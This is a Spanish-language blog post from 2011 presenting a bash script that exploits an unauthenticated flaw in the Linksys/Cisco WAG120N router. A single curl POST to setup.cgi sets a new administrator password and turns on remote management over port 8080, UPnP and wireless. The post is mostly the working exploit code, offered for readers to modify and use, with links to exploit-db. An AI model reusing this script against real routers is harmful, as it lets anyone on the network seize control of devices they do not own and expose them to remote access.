Archivo

miércoles, 2 de marzo de 2011

Resetear la clave del router Linksys Cisco Wag120n


     Sin necesidad de ningún tipo de credenciales ni logueo previo, es posible cambiar la clave del administrador (entre otras cosas =) del router Linksys Wag120n, al ver el exploit de los chicos de ircrash me dieron ganas de hacer mi propia versión en bash (hace muuucho q no hago nada con este lenguaje scripting).

     Como siempre digo, sean libres de modificarlo a gusto y a portarse bien, sean chicos buenos ~(8(|)


#!/bin/bash
#
# Este script cambiara la clave de administrador
# del router Linksys Wag120n por el password pasado 
# por parametro.
#
# Ej: $./linksyspwn 192.168.1.1 qwerty
#
# www.e-videncia.com.ar
# by Mario Corvalan - Marzo 2011
#
param=(
"-F \"user_list=1\"
-F \"h_user_list=1\"
-F \"sysname=admin\"
-F \"remote_management=enable\"
-F \"http_wanport=8080\"
-F \"upnp_enable=enable\"
-F \"wlan_enable=enable\"
-F \"igmp_proxy_enable=enable\"
-F \"save=Save+Settings\"
-F \"h_pwset=yes\"
-F \"sysname_changed=yes\"
-F \"pwchanged=yes\"
-F \"pass_is_default=false\"
-F \"h_remote_management=enable\"
-F \"pass_is_none=no\"
-F \"h_upnp_enable=enable\"
-F \"h_wlan_enable=enable\"
-F \"h_igmp_proxy_enable=enable\"
-F \"todo=save\"
-F \"this_file=Administration.htm\"
-F \"next_file=Administration.htm\"
-F \"message=\"
-F \"h_wps_cur_status=\""
)
if [ $# != 2 ]
then
echo "Ejecutar: ./dlinkpwn.sh <ip> <new_pass>"
exit 1
fi
curl -F "sysPasswd=$2" -F "sysConfirmPasswd=$2" `echo ${param[0]}` http://$1/setup.cgi




Para mas información ...

http://ircrash.com/
http://www.exploit-db.com/exploits/16252/
Publicar un comentario